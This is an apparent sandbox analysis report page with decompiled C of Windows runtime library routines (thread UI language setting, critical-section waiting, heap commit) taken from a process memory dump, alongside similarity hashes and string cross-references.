						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01876D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01908938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0186B150();
													}
													_t116 = E01906D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1958638; // 0x0
																	_t122 = L018738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0189FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0189FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0189FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0189FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0189FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0189FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1957b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1957b84 = _t75;
						_t73 = E0187EB70(_t134, 0x1957b60);
						if( *0x1957b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0187FF60( *0x1957b20);
							}
						}
						goto L5;
					}
				}
			}

0x0189fab0
0x0189fab2
0x0189fab3
0x0189fab4
0x0189fabc
0x0189fac0
0x0189fb14
0x0189fb17
0x0189fac2
0x0189fac8
0x0189facd
0x0189fad3
0x0189fad3
0x0189fadd
0x0189fb18
0x0189fb1b
0x0189fb1d
0x0189fb1e
0x0189fb1f
0x0189fb20
0x0189fb21
0x0189fb22
0x0189fb23
0x0189fb24
0x0189fb25
0x0189fb26
0x0189fb27
0x0189fb28
0x0189fb29
0x0189fb2a
0x0189fb2b
0x0189fb2c
0x0189fb2d
0x0189fb2e
0x0189fb2f
0x0189fb3a
0x0189fb3b
0x0189fb3e
0x0189fb41
0x0189fb44
0x0189fb47
0x0189fb4a
0x0189fb4d
0x0189fb53
0x018dbdcb
0x018dbdcb
0x0189fb59
0x0189fb5b
0x0189fb5b
0x0189fb5e
0x018dbdd5
0x018dbdd8
0x00000000
0x018dbdda
0x00000000
0x018dbdda
0x0189fb64
0x0189fb64
0x0189fb64
0x0189fb67
0x0189fb6e
0x0189fb70
0x0189fb72
0x00000000
0x0189fb78
0x0189fb7a
0x0189fb7a
0x0189fb7d
0x0189fb80
0x018dbddf
0x018dbde1
0x00000000
0x018dbde3
0x00000000
0x018dbde3
0x0189fb86
0x0189fb86
0x0189fb86
0x0189fb8b
0x0189fb90
0x0189fb92
0x0189fb94
0x0189fb9a
0x0189fb9b
0x0189fba1
0x018dbde8
0x018dbdeb
0x018dbded
0x018dbeb5
0x018dbeb5
0x018dbebb
0x018dbebd
0x018dbec3
0x018dbed2
0x018dbedd
0x018dbedd
0x018dbeed
0x00000000
0x018dbdf3
0x018dbdfe
0x018dbe06
0x018dbe0b
0x018dbe0d
0x018dbe0f
0x018dbe14
0x018dbe19
0x018dbe20
0x018dbe25
0x018dbe27
0x018dbe35
0x018dbe39
0x018dbe46
0x018dbe4f
0x018dbe54
0x018dbe56
0x018dbef8
0x018dbef8
0x00000000
0x018dbe5c
0x018dbe5c
0x018dbe60
0x00000000
0x018dbe66
0x018dbe66
0x018dbe7f
0x018dbe84
0x018dbe87
0x018dbe89
0x018dbe8b
0x018dbe99
0x018dbe9d
0x018dbea0
0x018dbeac
0x018dbeaf
0x018dbeb1
0x018dbeb3
0x018dbeb3
0x00000000
0x018dbea2
0x018dbea2
0x00000000
0x018dbea2
0x018dbe8d
0x018dbe8d
0x018dbe92
0x00000000
0x018dbe92
0x018dbe8b
0x018dbe60
0x018dbe3b
0x018dbe3b
0x018dbe3e
0x00000000
0x018dbe40
0x018dbe40
0x018dbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x018dbe44
0x018dbe3e
0x018dbe29
0x018dbe29
0x00000000
0x018dbe29
0x018dbe27
0x00000000
0x0189fba7
0x0189fba7
0x0189fbab
0x018dbf02
0x0189fbb1
0x0189fbb1
0x0189fbb8
0x0189fbbd
0x0189fbbd
0x0189fbbf
0x0189fbbf
0x0189fbc5
0x0189fbcb
0x0189fbf8
0x0189fbf8
0x0189fbfa
0x00000000
0x0189fc00
0x0189fc00
0x0189fc03
0x00000000
0x0189fc09
0x0189fc09
0x0189fc0f
0x0189fc15
0x0189fc23
0x0189fc23
0x0189fc25
0x0189fc27
0x0189fc75
0x0189fc7c
0x0189fc84
0x00000000
0x0189fc29
0x0189fc29
0x0189fc2d
0x0189fc30
0x018dbf0f
0x00000000
0x0189fc36
0x0189fc38
0x0189fc3b
0x0189fc41
0x018dbf17
0x018dbf19
0x018dbf48
0x018dbf4b
0x00000000
0x018dbf1b
0x018dbf22
0x018dbf24
0x018dbf26
0x00000000
0x018dbf2c
0x018dbf37
0x018dbf39
0x018dbf3b
0x00000000
0x018dbf41
0x018dbf41
0x018dbf41
0x018dbf41
0x018dbf45
0x00000000
0x018dbf45
0x018dbf3b
0x018dbf26
0x00000000
0x0189fc47
0x0189fc47
0x0189fc49
0x0189fcb2
0x0189fcb4
0x0189fcb6
0x0189fcdc
0x0189fcdc
0x00000000
0x0189fcb8
0x0189fcc3
0x0189fcc5
0x0189fcc7
0x00000000
0x0189fcc9
0x0189fcc9
0x0189fccd
0x00000000
0x0189fccd
0x0189fcc7
0x00000000
0x0189fc4b
0x0189fc4b
0x0189fc4e
0x0189fc4e
0x0189fc51
0x0189fc51
0x0189fc54
0x0189fc5a
0x0189fc5c
0x0189fc5f
0x0189fc61
0x0189fc63
0x0189fc65
0x0189fc67
0x0189fc6e
0x0189fc72
0x0189fc72
0x0189fc72
0x0189fc72
0x0189fc67
0x0189fc61
0x00000000
0x0189fc5a
0x0189fc49
0x0189fc41
0x0189fc30
0x0189fc27
0x0189fc03
0x0189fbcd
0x0189fbd3
0x0189fbd9
0x0189fbdc
0x0189fbde
0x0189fc99
0x0189fc9b
0x0189fc9d
0x0189fcd5
0x0189fcd5
0x0189fc89
0x0189fc89
0x00000000
0x0189fc9f
0x0189fc9f
0x0189fca3
0x00000000
0x0189fca3
0x00000000
0x0189fbe4
0x0189fbe4
0x0189fbe4
0x0189fbe4
0x0189fbe9
0x0189fbf2
0x00000000
0x0189fbf2
0x0189fbde
0x0189fbcb
0x0189fbab
0x0189fc8b
0x0189fc8b
0x0189fc8c
0x0189fb80
0x0189fb72
0x0189fb5e
0x0189fc8d
0x0189fc91
0x0189fadf
0x0189fadf
0x0189fae1
0x0189fae4
0x0189fae7
0x0189faec
0x0189faf8
0x0189fb00
0x0189fb07
0x0189fb0f
0x0189fb0f
0x0189fb07
0x00000000
0x0189faf8
0x0189fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 018DBE0F

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 62b1ed83ad869cfab6148b81e6f64308911eafc4d06980775d062706047e2c18
Instruction ID: dde53ce62d7e5d6f6456af931e0a83f5cf48fe8832373d0e41ce184972d1c163
Opcode Fuzzy Hash: 62b1ed83ad869cfab6148b81e6f64308911eafc4d06980775d062706047e2c18
Instruction Fuzzy Hash: 3DA12631B007568BEF29DF6CC45077ABBA4AF49718F094569EB06DB681DB34DB01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01862D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01862D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1955350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1957bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018A97C0();
				}
				if( *0x19579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01891624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01887D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E018FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E018A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0189E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L018BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1956901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1956901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E018A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01887D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01887D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E018E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E018FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1955350;
							if(_t109 != 0x1955350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E018FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E018F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01862d8a
0x01862d8a
0x01862d92
0x01862d96
0x01862d9e
0x01862da0
0x01862da3
0x01862da5
0x01862da8
0x01862dab
0x01862db2
0x018bf9aa
0x018bf9ab
0x018bf9ae
0x018bf9ae
0x01862db8
0x01862dc2
0x018bf9b9
0x018bf9be
0x018bf9bf
0x018bf9bf
0x01862dcf
0x018bf9c9
0x01862dd5
0x01862dd5
0x01862dd5
0x01862dde
0x01862de1
0x01862e70
0x01862e72
0x01862e72
0x01862de7
0x01862deb
0x01862e7c
0x01862e83
0x01862e85
0x01862e8b
0x01862e8d
0x01862e92
0x01862e92
0x01862e85
0x01862df1
0x01862df7
0x01862df9
0x01862df9
0x01862dfc
0x01862dff
0x01862e02
0x00000000
0x01862e05
0x01862e0c
0x018bf9d9
0x01862e12
0x01862e12
0x01862e12
0x01862e1a
0x018bf9e3
0x018bf9e9
0x018bf9f0
0x018bf9f6
0x018bf9f8
0x018bf9f8
0x018bf9f0
0x01862e23
0x018bfa02
0x018bfa03
0x018bfa05
0x018bfa06
0x00000000
0x01862e29
0x01862e29
0x01862e2e
0x01862e34
0x01862e3e
0x00000000
0x00000000
0x01862e44
0x01862e47
0x01862e4d
0x00000000
0x00000000
0x01862e4f
0x01862e54
0x00000000
0x00000000
0x01862e5a
0x01862e5f
0x01862e9a
0x01862ea4
0x01862ea5
0x01862ea8
0x01862eaf
0x01862eb2
0x01862eb5
0x018bfae9
0x018bfaeb
0x018bfaed
0x018bfaef
0x018bfaf7
0x018bfaf8
0x018bfafd
0x018bfaff
0x018bfb04
0x018bfb04
0x018bfaff
0x01862ec0
0x01862ec4
0x01862ec6
0x01862ec8
0x018bfb14
0x018bfb18
0x018bfb1e
0x018bfb21
0x018bfb21
0x01862ece
0x01862ece
0x01862ece
0x01862ed7
0x01862e61
0x01862e63
0x018bfa6b
0x018bfa71
0x018bfa76
0x018bfa78
0x018bfa8a
0x018bfa7a
0x018bfa83
0x018bfa83
0x018bfa8f
0x018bfa91
0x018bfa97
0x018bfa9d
0x018bfaa4
0x018bfaaa
0x018bfaaf
0x018bfab1
0x018bfac3
0x018bfab3
0x018bfabc
0x018bfabc
0x018bfac8
0x018bfacb
0x018bfadf
0x018bfadf
0x018bfacb
0x018bfaa4
0x018bfa91
0x01862e6f
0x01862e6f
0x01862e5f
0x018bfa13
0x018bfa15
0x018bfa17
0x018bfa1f
0x018bfa21
0x018bfa22
0x018bfa25
0x018bfa28
0x018bfa2f
0x018bfa2f
0x018bfa2a
0x018bfa2a
0x018bfa2a
0x018bfa31
0x018bfa34
0x018bfa36
0x018bfa3c
0x018bfa3e
0x018bfa41
0x018bfa43
0x018bfa45
0x018bfa45
0x018bfa41
0x018bfa3c
0x018bfa4a
0x018bfa4f
0x018bfa51
0x018bfa53
0x018bfa56
0x018bfa5b
0x018bfa5e
0x00000000
0x018bfa5e
0x01862e23

Strings

RTL: Re-Waiting, xrefs: 018BFA4A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: b17c1542d317a75471e8986ffa86ce9d949a1223c042e3c1bb31f7baa5a6d39e
Instruction ID: 0dc28924f79e1251aaa62d630a95c8308f139aa48c5fe544687591111fcb2841
Opcode Fuzzy Hash: b17c1542d317a75471e8986ffa86ce9d949a1223c042e3c1bb31f7baa5a6d39e
Instruction Fuzzy Hash: 2161F771A006499FEB26DF6CCC80BBEBBAAEB44718F1446A9D611D73C2C7349B00C791

Uniqueness

Uniqueness Score: -1.00%

Function 01930EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01930EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0192FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01931074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E018A9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0192A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0192A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1958b04 >> 0x14) + (_v44 -  *0x1958b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01887D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0192138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01887D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0191FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1958724 & 0x00000008) != 0) {
						E019252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019315B5(0x1958ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01930eb7
0x01930eb9
0x01930ec0
0x01930ec2
0x01930ecd
0x0193105b
0x0193105b
0x01931061
0x01931066
0x01931066
0x0193106b
0x01931073
0x01931073
0x01930ed3
0x01930ed6
0x01930edc
0x01930ee0
0x01930ee7
0x01930ef0
0x01930ef5
0x01930efa
0x01930efc
0x01930efd
0x01930f03
0x01930f04
0x01930f06
0x01930f07
0x01930f09
0x01930f0e
0x01930f14
0x01930f23
0x01930f2d
0x01930f34
0x01930f34
0x01930f14
0x01930f52
0x00000000
0x00000000
0x01930f58
0x01930f73
0x01930f74
0x01930f79
0x01930f7d
0x01930f80
0x01930f86
0x01930fab
0x01930fb5
0x01930fc6
0x01930fd1
0x01930fe3
0x01930fd3
0x01930fdc
0x01930fdc
0x01930feb
0x01931009
0x01931009
0x01931015
0x01931027
0x01931017
0x01931020
0x01931020
0x0193102f
0x0193103c
0x0193103c
0x01931048
0x01931050
0x01931050
0x01931055
0x00000000
0x01931055
0x01930f88
0x01930f9e
0x01930fa2
0x01930fa9
0x00000000
0x00000000
0x00000000
0x01930fa9
0x00000000

Strings

`, xrefs: 01930F16

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 9c5331e5d68d0bb927db4702f98fb23e7b6790f733a4ae797644281e4b2fbf8f
Instruction ID: e9222b16dd4e708688744efbc9b09e611079b62d5b552d6e33e06a867af90596
Opcode Fuzzy Hash: 9c5331e5d68d0bb927db4702f98fb23e7b6790f733a4ae797644281e4b2fbf8f
Instruction Fuzzy Hash: 0B5191713083429FD325DF28D880B1BBBE9EBC4714F04092CF99A97290D771E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 0189F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0189F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01884120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E018A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E018A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E018A95D0();
							goto L11;
						} else {
							_t109 = L01884620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
